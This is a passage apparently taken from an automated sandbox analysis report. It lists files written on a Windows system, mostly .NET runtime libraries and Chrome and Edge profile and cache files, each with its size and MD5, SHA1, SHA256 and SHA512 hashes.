                                                                            916142d96c2380a583595933a761707741378f91

                                                                            SHA256

                                                                            b876153dc1657f2fe2bf2e1d36c7cbb1d3740ef26d1e21a23f12a9f9a56d47ad

                                                                            SHA512

                                                                            e0a9ffa60a37d138e90bd7059555c26019c5decd20f4e83c7ae89a81cc7e40b798bfe16cc30c2d1ba653f3cd9026121df275915c082eeffb16de1aa99e7fb734

                                                                          • C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\Microsoft.DiaSymReader.Native.amd64.dll

                                                                            Filesize

                                                                            1.8MB

                                                                            MD5

                                                                            2357652c6dcc1032766c4ea8bd6bda3f

                                                                            SHA1

                                                                            7b6c5a1a2f31b861499940b85edd5594776a9f70

                                                                            SHA256

                                                                            0ff2b3aae686b88cbb7fcedf7a8b7081138da7cba529f5af3b25b342d10b0274

                                                                            SHA512

                                                                            e4d9317636ee634f4d965a623c819b716df557514dcaa5212e7da5941a3e425933590f1732cc694f3b9be3067002d270b04d29ff4ff280bcae865caef55a029f

                                                                          • C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\D3DCompiler_47_cor3.dll

                                                                            Filesize

                                                                            4.7MB

                                                                            MD5

                                                                            181634ec3a738b9f68210a635d211481

                                                                            SHA1

                                                                            097cd307dce3b1c2118b240f2c8bb0c483810aef

                                                                            SHA256

                                                                            465c86e72445fa291da87493bcc2e5bb15330a0b7e9829b0dd8f581a3d6f1c9e

                                                                            SHA512

                                                                            14893e76163edd8a72fd4071544a3c6e3e009b91bdd049d11d49ed64b17600bb866b8bd7c886f95e29204263cf556d5d91e94e0489b5f297b6c500fa44d50827

                                                                          • C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\vcruntime140_cor3.dll

                                                                            Filesize

                                                                            116KB

                                                                            MD5

                                                                            84f936958175c14285de2a4ce27ec9c6

                                                                            SHA1

                                                                            fe313889da818ca94fd07d5e555249894c17a27b

                                                                            SHA256

                                                                            f2c0ed88cabd45f9cea4a471f76f782ebfd18f77c1841d30d2a087e4968415a6

                                                                            SHA512

                                                                            e88fb2def83cad8108a9c27816f57805c3d0a0c442d2a857ea5164f2393f044ee1abb66f564f54bb25662de5a7320023f3f537f80983a60656c5e03f09614114

                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\CURRENT

                                                                            Filesize

                                                                            32B

                                                                            MD5

                                                                            9863c795d750b82c59d1ec1bd4effc5a

                                                                            SHA1

                                                                            7e5d9e6607167ba364ed1dd684aba837da480e9d

                                                                            SHA256

                                                                            1254e9093a3c6f236d33c4775b8c5226d3305cff070f54c1c256e1be71a78923

                                                                            SHA512

                                                                            ba8239ebcb1b1278078b062c2b9cea5761909fe4f911fb50565fc07b71cfb83962edce81ae93d7fc51b84a01930df5355b4b0ad308ca59efcd148b997923de4b

                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\MANIFEST-000001

                                                                            Filesize

                                                                            48B

                                                                            MD5

                                                                            6dc1d0dcf7e649481969a064304165d9

                                                                            SHA1

                                                                            980f64c6d0179a01995a6d844f58bc6522d76a75

                                                                            SHA256

                                                                            f4638c047e47b5afb0666c89e03c1a9369223e2defe8f672dd438c0e777e26db

                                                                            SHA512

                                                                            0f3f1f2e2db7f0218a11b4585c7f478bad64f0275bc053010e99d31254a5116633479fe7d4f82e34fb324f9d97931666ba1f997da6e395e31e9abda176c0dede

                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index

                                                                            Filesize

                                                                            32B

                                                                            MD5

                                                                            a4de6df6e062f1a252706da5451ba2ff

                                                                            SHA1

                                                                            d4b53a90401d0bfb0fe6fca7c8467551f8ad9ba0

                                                                            SHA256

                                                                            f86a449b6564d12c7020b288b0438d6c1422c4cdf120d039a050bd8cc1b862dc

                                                                            SHA512

                                                                            0679b530d9114255fed27add7d5335d2b3d5ecb9799fa10a1dc2d79b1d7b73e47d0c98e9e12a6fab382ed45954216ddaaff145093bb1aee2d9fa56b668d50fdb

                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\data_0

                                                                            Filesize

                                                                            8KB

                                                                            MD5

                                                                            4570c428f5904e58acbae87cece39b5b

                                                                            SHA1

                                                                            22caac3c462ea873f6cbee2e41b7b534eca87848

                                                                            SHA256

                                                                            140a58b39e07c46ca2840311e4baaa7bcb6d8912a5539d1560e147fbaa107dbf

                                                                            SHA512

                                                                            542d9cb0f63d9cbe7a63bba724e8836ba7c72a917135539e88107180636997bf23a68a88442f7766e7d51f6490ce7adea177591c093cbe823c52f930aa0e2d54

                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\data_1

                                                                            Filesize

                                                                            264KB

                                                                            MD5

                                                                            0777b42623773c24921a226c9690e8a4

                                                                            SHA1

                                                                            7571bad4bfbb8fa2fa923cf4798b0963d8e1a390

                                                                            SHA256

                                                                            7a6c87279727127acd5d3192b48c9b58c2d5a24087c542538482d57b6216ae64

                                                                            SHA512

                                                                            1bba6b2cf7a988c12b8351a3c2c8fde0361a7f87548e990475bb4a71ba015175d328fd848c12d88097b00797ca812207a3d1664be47058bd2b442dbb96c1ef0b

                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\data_2

                                                                            Filesize

                                                                            8KB

                                                                            MD5

                                                                            96c5f9f01be2afbbcd9a918aa60b1cb2

                                                                            SHA1

                                                                            60f44e4fef43d73eb5e7dcb35ad6edf206fd535d

                                                                            SHA256

                                                                            36bfb8fe1d46953866cf639aa6d2d2cd2e5419d3fe1bc852dfdd5c974ce6d9b3

                                                                            SHA512

                                                                            364bf4c1de38c67a09c1ec0fbcfa6abcd3d146875b5900f80c8b475f115002c4c98987f1342bdcd0c5e988ce10e72b7d370ae3ca78e9fec0568a0215f790371a

                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\data_3

                                                                            Filesize

                                                                            8KB

                                                                            MD5

                                                                            3f485d4a585b0a664d81b1d96c57838e

                                                                            SHA1

                                                                            b8268c116c9d92c0c8fde7aac63d8a8dbd52956f

                                                                            SHA256

                                                                            dd13f1843f763041da66e3411bf22899088c6ed7cc2c7ccb06da39c2e721e6ed

                                                                            SHA512

                                                                            6a21eacc6f87f83d5b4109138849e646a004d47e4d86c5bc4376a516394c3b90b7121c8a4f67fe22d6ae0575bb82e91d10b5fcbcfa0a87f049a7b0bd4a79b96f

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                            Filesize

                                                                            3KB

                                                                            MD5

                                                                            aa0a32b11dca7b04f4cc5fe8c55cb357

                                                                            SHA1

                                                                            00e354fd0754a7d721a270cdc08f970b9a3f6605

                                                                            SHA256

                                                                            e336a593bd31921c46757a88a99759f6a33854d0c8b854c0c8f118e5cede1ea1

                                                                            SHA512

                                                                            1db91d3540da2c7eb4e151d698f3a9c1d2caed3161c41f1c2c73781a65e9dfc818902f0220c0aa9fc2c617d4851f23f4a576c4e5fe0f40ec78e9ed01c8ad8b30

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                            Filesize

                                                                            152B

                                                                            MD5

                                                                            68de3df9998ac29e64228cf1c32c9649

                                                                            SHA1

                                                                            be17a7ab177bef0f03c9d7bd2f25277d86e8fcee

                                                                            SHA256

                                                                            96825c1e60e4a87dc5dbae78b97104e6968275fa1602c69053d0192cae143f43

                                                                            SHA512

                                                                            1658b0bc504a8a5c57c496477cd800a893d751f03d632ef50aff9327cd33ad0e4e4f27bcb85b20bd22bef2ca65600b7d92e2a1f18fd3d08ad6391983de77beaf

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                            Filesize

                                                                            152B

                                                                            MD5

                                                                            6f738fcca0370135adb459fac0d129b9

                                                                            SHA1

                                                                            5af8b563ee883e0b27c1c312dc42245135f7d116

                                                                            SHA256

                                                                            1d37a186c9be361a782dd6e45fe98b1f74215a26990af945a2b8b9aa4587ec63

                                                                            SHA512

                                                                            8749675cdd8f667ff7ca0a0f04d5d9cad9121fd02ed786e66bcd3c1278d8eb9ce5995d3e38669612bdc4dccae83a2d1b10312db32d5097ef843512244f6f769a

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                            Filesize

                                                                            152B

                                                                            MD5

                                                                            a19dd032b946735ab38954a3aa88d4ac

                                                                            SHA1

                                                                            1bc90ccc54518688bd7407d2c1d72d3d69f23e5e

                                                                            SHA256

                                                                            5ff50a545059d39ea5d0c3dc3360eb805555f5240b42374098875e01c5b84561

                                                                            SHA512

                                                                            93205ccb6945d3d7375e548569625c95450fb20e6024506028abbda353f5290e8f20e7b6f98653019f38d56c4add7539c5b1f5823a73394727c7ec130ae0997d

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                            Filesize

                                                                            152B

                                                                            MD5

                                                                            1286128766a668c969dac0be3293b3b8

                                                                            SHA1

                                                                            f84e539bc17c174ea5361b8483108554364a6b6d

                                                                            SHA256

                                                                            3213d8eac2996a1b604a426eac8c830b10bde3512420a31a1bf00d343e6a6cc5

                                                                            SHA512

                                                                            afc9d8c1cdc305fd48af0aeaa36084bd5ea3a5a20a945559fd3d7aa0084349f288a99e446d9c3409862da61d9d938e3e50c973b6781993485a82e2d9c407e2df

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                            Filesize

                                                                            319B

                                                                            MD5

                                                                            5543c240340c5afacd239345d10722e2

                                                                            SHA1

                                                                            77b6ed42ee0c4087c6512aee986a5c7b416aaf24

                                                                            SHA256

                                                                            b8a0f3e84e8e104997c8296849255468a2e39689b4f01e8d6b5e4c896dbc4330

                                                                            SHA512

                                                                            53ef79d95a437254a950329013c586ce7425d4c082c11dee9137b8eb333c41d72b4f86afb716186c7e7389b0f21fa7d624fd1deb2f025e67b9cb923b2e7f938f

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

                                                                            Filesize

                                                                            264KB

                                                                            MD5

                                                                            c1352cdeb4b984de1b535ba1786a4c90

                                                                            SHA1

                                                                            8611d477883572a9e25d63d22eded8a041aa72a8

                                                                            SHA256

                                                                            e117d5bc8901464f683ec5cf36f613fdf117df5683a3b7e2fdf280ed94b1b462

                                                                            SHA512

                                                                            ddd38ccf4dd3ed454b0834e7c204bd328155777669da458c6c118a4aebb8c8437241d82f1a36b8fad07155379df335cd56afc393d1ab661a63de9418ea6dbc8c

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                            Filesize

                                                                            116KB

                                                                            MD5

                                                                            4856da29d1ded5194dc849a3c5ce4d5d

                                                                            SHA1

                                                                            36f294930a6517501462d46c8c31cd490125c2af

                                                                            SHA256

                                                                            9e9932db333129693f9e0387770fe5c15bb4ba64fe676ff990d928c66691403c

                                                                            SHA512

                                                                            110ded386a499918c84d45a478d6e776c6ae471e7173ccf7ab805f1cadbb020f75eb48fda0d3cfb1a39ee138c884edb80e0fb4a85b7bd27f80350e766fb0e922

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache

                                                                            Filesize

                                                                            521B

                                                                            MD5

                                                                            6f329bdd5270b70ed8ff3fbec3bef15e

                                                                            SHA1

                                                                            a10dfb323e724d6ad4b9fa4ada40bb82021fa98c

                                                                            SHA256

                                                                            1daf50256a3745ee7cbd83ca68dce76434501a884357e16fd3fad5e9876284ef

                                                                            SHA512

                                                                            9921675fd0e5d7ff4b968e0407d19975c463c47f670d4757d6a9925f47966ed86ca79524acf529e4a0bec7a99312b25a372ac4a11d7cd588e4c90a765f0674d9

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                            Filesize

                                                                            331B

                                                                            MD5

                                                                            ba5175d67012b990cde1d9dfab50a5f0

                                                                            SHA1

                                                                            d645692c36d99ea33c673c881020466e24264d6f

                                                                            SHA256

                                                                            c76f129ddd2f8d3f97b82c3f9a2ded31795c53279a44f8f974eaab301aabff48

                                                                            SHA512

                                                                            88e3f96081eab35a04b6139d7759a2d2e292b689d032fb95390e1535d6dda80139bc40a5a87bc066f6b713d00f64d1c809e03e54c296e32e401544c1c032b27e

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                            Filesize

                                                                            5KB

                                                                            MD5

                                                                            0851c25fa93e9be4bba7565c40920b32

                                                                            SHA1

                                                                            22fc4edb34d6c21bea6e806ddab83f24c0b83a13

                                                                            SHA256

                                                                            e9f10926e81326f0a4c43fe7f1c346ad56dd31e34dde91488b0cebcc0174254a

                                                                            SHA512

                                                                            c0fa5083998b07bc29bf8d966f1db6eebbd86b9759c905b679dcfb7d16ef7612857baee2f55b547be52808ac07e6557640841aa7a3403d64ad35f96ae01ae528

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                            Filesize

                                                                            5KB

                                                                            MD5

                                                                            d7c6a461a4de68a749659e44bc1cac7d

                                                                            SHA1

                                                                            5d76e7b7e09c9ebeae77d18778702339f0ebb31c

                                                                            SHA256

                                                                            1abb1d1f5ac02ab26a23a14aa81283ce6688bc2a953332d510fcba720fc52479

                                                                            SHA512

                                                                            b4c8daefaf138d0f7a429e2ebc77b2c08d52e4249c50fcf4e7e5a2e143c393307585f104f221f3f43e47082750e49c9cd7ecfcdb7c321dd7c3bff406d8e9e0f0

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                            Filesize

                                                                            5KB

                                                                            MD5

                                                                            8d79f001d7601c5310f81f5484e6510a

                                                                            SHA1

                                                                            a2eeafb300b88e8449c974e6469bcb1a5ddf5e9f

                                                                            SHA256

                                                                            733a42a4330b8556c65f245e0e96457a80b355073350a2182995fc397dcab32e

                                                                            SHA512

                                                                            72fe4999d566a8e87909d77c5764f0d05cc300e963a6bb031ddbcb37974ea28c15784c408ba3ce7d9f2dbc520fc5ce1cdbf3db70c24631b4d9889d774bfcf713

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                            Filesize

                                                                            6KB

                                                                            MD5

                                                                            b3d9b758fbc6185f068a33abcb8c0f17

                                                                            SHA1

                                                                            aabf9e1ca931748db2fac62732222ae3559fbb28

                                                                            SHA256

                                                                            d20177ccb0e1fb828113e666b40adcae760d1660e49eafaab212d38081a60742

                                                                            SHA512

                                                                            cbb9582f5bf49203a03dfffd5a991f7413f22c55d56cc1b908f856148681ef3fc4cda1aed7735fdb814c5f591d332988055f6bf9c1104d8331ba0bf588937d4f

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                            Filesize

                                                                            5KB

                                                                            MD5

                                                                            307ee4b93b889f22eda3f3e687349afc

                                                                            SHA1

                                                                            08157b597d98463b93216a14e1bfcddf4cd54473

                                                                            SHA256

                                                                            22794e32d1e91c47caa32fe7d45ef159d32cf1c797235cd60bb921af8be0fd78

                                                                            SHA512

                                                                            923c7d92a0d0953222e5e35d97851847b6b4aaa21dc2d0bea430cd242cb43784274ac8e584ec05059decbaa2bea65d87c6f2e0de973d2811be792343355a610b

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                            Filesize

                                                                            137B

                                                                            MD5

                                                                            a62d3a19ae8455b16223d3ead5300936

                                                                            SHA1

                                                                            c0c3083c7f5f7a6b41f440244a8226f96b300343

                                                                            SHA256

                                                                            c72428d5b415719c73b6a102e60aaa6ad94bdc9273ca9950e637a91b3106514e

                                                                            SHA512

                                                                            f3fc16fc45c8559c34ceba61739edd3facbbf25d114fecc57f61ec31072b233245fabae042cf6276e61c76e938e0826a0a17ae95710cfb21c2da13e18edbf99f

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                            Filesize

                                                                            319B

                                                                            MD5

                                                                            73533a707f5c01a04c90974855b657b8

                                                                            SHA1

                                                                            890aa7a804e08dd5a2d3dbde185a439566951b8a

                                                                            SHA256

                                                                            8bd56834778960472c974babbbbf68e309ec2a245a62a9fef73c0cc5f1f6c0e4

                                                                            SHA512

                                                                            475fff0fb4de502d13fcb201e4048a079b2f0451d5c0338c726fe572f40f43d52f7c09874ad13806305ef67a592b9266bd673be51d4cc657342f9ba03a65c1d4

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13364160360912901

                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            16156abd967973c4f7229426521d4d97

                                                                            SHA1

                                                                            5a57d3d46d19b60b9190f564a9c31f8f760866bf

                                                                            SHA256

                                                                            a13cb33931957a0efbd971d41490ff53ec3ba623689c6a69fc9070640d8f48f1

                                                                            SHA512

                                                                            f06b3606a2493cfc7f0f035c30fcaee746e967d8ff2dc9f2f62da92cdd3c9a0d1e184ecd8701fd45cc2f2c20fa6799733db51ba71e4f5c0c6b665b613c92a9cd

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13364160361192901

                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            c4c1d9eeb2e3a0ff9b7612c592cd311f

                                                                            SHA1

                                                                            499c8136cac9ddd4095fa5cfde1789cd62d75158

                                                                            SHA256

                                                                            f7d17b6adec89423e1f00c2605b411d5261b9f05fb35c602ef9ce23beb5814af

                                                                            SHA512

                                                                            d15015ba655f2b8dae824edefdc575f0603b5bb8d71e2cd68be9334157ff10a6cb37c53c268484da02b223b3f5f0de6d7dd7026cfea0788644c92e74e921acd0

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                            Filesize

                                                                            347B

                                                                            MD5

                                                                            3fac0502c25e1978ec5388db755b89b5

                                                                            SHA1

                                                                            b582e2b3ec9f8b07ad17804b5c5f26c04ef49ffc

                                                                            SHA256

                                                                            97831cecd6663380d4d7b418f68ccc3cea65459214f084073da007f50991b411

                                                                            SHA512

                                                                            bc87021cfc5d01dd903103e5794968c2bbb7401187295923cf95d264be4a0ec746810e9fd6d148d8442a7b126ba74f7cb10fbd969113bd138f6260b5eb50b013

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                            Filesize

                                                                            326B

                                                                            MD5

                                                                            ad816d222ecc543439ba018144ba4707

                                                                            SHA1

                                                                            9d0ee3626516382cf0ed2158a79998293f923b2b

                                                                            SHA256

                                                                            38746bd44dd30363ad88c46eb2ce3ef37f1add53fabe38398fb2e7ce082be7ce

                                                                            SHA512

                                                                            a38d3e74f872f666b7d45618b98b8035014ed5007da31643baf2b5a8c2981a57a9a24cb9a6e5c45a3b1b394d1cacb866e7e8d2371887d602e33697c01145e581

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

                                                                            Filesize

                                                                            128KB

                                                                            MD5

                                                                            887940ae8434a6d10f06bad8c7707072

                                                                            SHA1

                                                                            82c5dd09ccb2ceed1f1413e1590cc03d182b9a75

                                                                            SHA256

                                                                            77d23be4a2076e45eab078157588ee7ebb0f560b2ba889cb667404a270abf369

                                                                            SHA512

                                                                            e8b0acb6db5fa059ac1f42910507c03f150865e1407edf84195202ae303f81a0862ef58bfc141f6b809c7391bb5332702f75b55340852b7b41e723590b164473

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                            Filesize

                                                                            16B

                                                                            MD5

                                                                            6752a1d65b201c13b62ea44016eb221f

                                                                            SHA1

                                                                            58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                            SHA256

                                                                            0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                            SHA512

                                                                            9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                            Filesize

                                                                            319B

                                                                            MD5

                                                                            3a20cf9a7a634e0d361dab0a29bf4038

                                                                            SHA1

                                                                            534788415b5c4eb02a6cbd28e2084dff4428b349

                                                                            SHA256

                                                                            e6c559294b773b3d2cd1d548d57153854bbb81f141183ebef320c281371d4a1e

                                                                            SHA512

                                                                            c6042277a5101aed275b6a262fd365a6683a454a8d2d933bc9e4ed8e33799ad84b62903752ee80f6cfe10838a36304dfca689d0dc716b95e3a6efda0cdd9e9a8

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                            Filesize

                                                                            337B

                                                                            MD5

                                                                            5af946addf5bd8de4a5a58e1eb40adea

                                                                            SHA1

                                                                            a5063056250b729cf06f0461dd1a52661a74c705

                                                                            SHA256

                                                                            6a3a6a098731d9301d52b5fa00f5bca62c71e70d0ebedee66793895e8f4d5598

                                                                            SHA512

                                                                            0ab29d35a822ade2ea83ee8385b936e4ba74fa2cbe74df6821f931007acf00be7fea3467de6c398a05dcc76d09ba8d9b37637f55cdbfafd77bf44e590a0b662a

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0

                                                                            Filesize

                                                                            44KB

                                                                            MD5

                                                                            8d49ac0f89410bc8df7d426241555514

                                                                            SHA1

                                                                            d24c37bf3e0396c9d861f7ae71672efdfe4aeeb3

                                                                            SHA256

                                                                            d768fbbdc5a2a234ef9f17ca7150cc04cdfe2239ec004decb00755062e8a9394

                                                                            SHA512

                                                                            c0753dcf48fe250ff7627afa9d9334841ac344f3f85c53ee1a134483e51a524ed8e67d5976a36100ebc54072b1820114d8994adf0dcce1ab6b7dd338aeb28be5

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1

                                                                            Filesize

                                                                            264KB

                                                                            MD5

                                                                            c7a821c65ee9655eebd47e1ed7b991e3

                                                                            SHA1

                                                                            ec75d748e5a0dbd0b6ef38e14be9dc69a9ea417e

                                                                            SHA256

                                                                            38b3a65d8cff441d80829d67893c51eb72eaf2f553b9dd316005010b034063d7

                                                                            SHA512

                                                                            d4653aef613f44e08dc26d0e7212d32ca918d986203e71dff9224d01ded92c2a11d4121bcd5d9332d57605d4123168f9a4dfaf02aaee26ea879b65918310d7ed

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3

                                                                            Filesize

                                                                            4.0MB

                                                                            MD5

                                                                            b7bc1fb78dc43625c372f723020fae2d

                                                                            SHA1

                                                                            efe8829ecbf752566470f109148fe16ebeaf5ec8

                                                                            SHA256

                                                                            c107cf956bef3ac26669094160e795371227b0c8c3d757a23a8368f82ec091e3

                                                                            SHA512

                                                                            c8534438931077edbd6da8a4826fbbe30834573a6b40863afa8bf6de658b0a067318dae83062ca6baf31f70c32934d8111b3c90eac1bedfe1094a8616e7545d6

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                            Filesize

                                                                            11B

                                                                            MD5

                                                                            b29bcf9cd0e55f93000b4bb265a9810b

                                                                            SHA1

                                                                            e662b8c98bd5eced29495dbe2a8f1930e3f714b8

                                                                            SHA256

                                                                            f53ab2877a33ef4dbde62f23f0cbfb572924a80a3921f47fc080d680107064b4

                                                                            SHA512

                                                                            e15f515e4177d38d6bb83a939a0a8f901ce64dffe45e635063161497d527fbddaf2b1261195fde90b72b4c3e64ac0a0500003faceffcc749471733c9e83eb011

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                            Filesize

                                                                            11KB

                                                                            MD5

                                                                            49f5e98ecd159cb4c93756da75546db6

                                                                            SHA1

                                                                            722e251b1022b1bacc4546db849c0eec693236b7

                                                                            SHA256

                                                                            bcd52f56df29cf528f4ecfe583037117b878b16e2b799c9bc9517da1fcbe6953

                                                                            SHA512

                                                                            c3d4c32f57674bb2eef28ae6398dff196f0398c0a92d31b3f19a52fa2480a1dd56308588d28ff4aa524341767e12d2b1aaedb7f468088566dc5a922b5feb1fc1

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                            Filesize

                                                                            11KB

                                                                            MD5

                                                                            c908c4d357d37a4f6b55d70a123b1fff

                                                                            SHA1

                                                                            7402c0b2eb35a2178442c861a431765013b9eb69

                                                                            SHA256

                                                                            44a18b565aeb2d1a6c56589633d3a2a6bf9cf160d1e056fa16edf6d49dc79970

                                                                            SHA512

                                                                            4afddfabccf27513a03230293121178f75b5a5b8396d819f26ffc703125f888bf81d96f832846b62bf1a0ff6dbcbfef8a45f5d76103977a808b1b09b5d9d33c8

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                            Filesize

                                                                            11KB

                                                                            MD5

                                                                            46bae5da9e1608697ef109b71b0c85bc

                                                                            SHA1

                                                                            a9d31a89207cbe82ecc1844bee72fee549207498

                                                                            SHA256

                                                                            54769c863675ad43d0b3d357409c4b41ac3f431973c6480c137e0c00929fb84b

                                                                            SHA512

                                                                            7127f38ea338d17999d5f60df09a1a9521c7fff09f6445cfd8e7631ce07a70f07c6077a1660811a0035091ca1c7e07bd1e099049b7de0cea89ff37a30e6fd155

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

                                                                            Filesize

                                                                            264KB

                                                                            MD5

                                                                            f50f89a0a91564d0b8a211f8921aa7de

                                                                            SHA1

                                                                            112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                                            SHA256

                                                                            b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                                            SHA512

                                                                            bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt

                                                                            Filesize

                                                                            4B

                                                                            MD5

                                                                            c654f353879670bc5a6d4097e26e19ad

                                                                            SHA1

                                                                            6f686aee05b7e6537255d207e201e821a7233a32

                                                                            SHA256

                                                                            917689399634f044af89c129cfe27a32fdfa1d733620021c9a7462c6aac87238

                                                                            SHA512

                                                                            3307a51899aadd447f87810a3e5063d94b4514a204aadb92e1b4e9d04303e8ad50be30e2efb3037780422a835fdd4c296a9df78c509afc7441dbb4c16b7d71f9

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

                                                                            Filesize

                                                                            896KB

                                                                            MD5

                                                                            c231e6477a9b88cc1953697767b7e8ce

                                                                            SHA1

                                                                            0d872059471c71b79f260151586645201afa6aa0

                                                                            SHA256

                                                                            f3e5026d028864b10e54512930164daff14eb9c6863f2c459d69333b2c8e4313

                                                                            SHA512

                                                                            158642b202b39718a4d2efd57bca0ee1ced92fd9a48a5bc26b88d7c138f315144d04a53571f82623a682cc5c93d3d8c2bb862b2d7b09d2051609e5d0270fa043

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

                                                                            Filesize

                                                                            896KB

                                                                            MD5

                                                                            2b648ba9618df3aa088c0d348bb6a53b

                                                                            SHA1

                                                                            d9e5333f8958d25ada287c710f03e244cb61cb56

                                                                            SHA256

                                                                            04e259fd19a6b12d382d465f50f6588d4fe7587f87b05c437a4ea1eee8fe1918

                                                                            SHA512

                                                                            5dae5b2d1d519c6fb4ce1ca74a17e51ff4d1e4518a675e64b3b29358d274821f40b112d221dc78c07048e60b36bec8dd6dd59ca3361e9d504d9440e75b603d92

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\winword.exe_Rules.xml

                                                                            Filesize

                                                                            332KB

                                                                            MD5

                                                                            969e9046c3ab9140fc067ba9f99c6e68

                                                                            SHA1

                                                                            7df9ce1d81d8e08cb7842bc2e69c51ec09997a90

                                                                            SHA256

                                                                            cd06de1d51ab6089231abb98052ddee91284f1b507317d4dd76a603bf79d0961

                                                                            SHA512

                                                                            64bcbdbc8b565b7b7c26415e076b36527b13871ef630a0ff7698598b4b5c3e8fa9172bfb193df13ce3f71366a1127ef31693c92460692b847b1fb46b7d6aae5d

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak

                                                                            Filesize

                                                                            9KB

                                                                            MD5

                                                                            7050d5ae8acfbe560fa11073fef8185d

                                                                            SHA1

                                                                            5bc38e77ff06785fe0aec5a345c4ccd15752560e

                                                                            SHA256

                                                                            cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

                                                                            SHA512

                                                                            a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                            Filesize

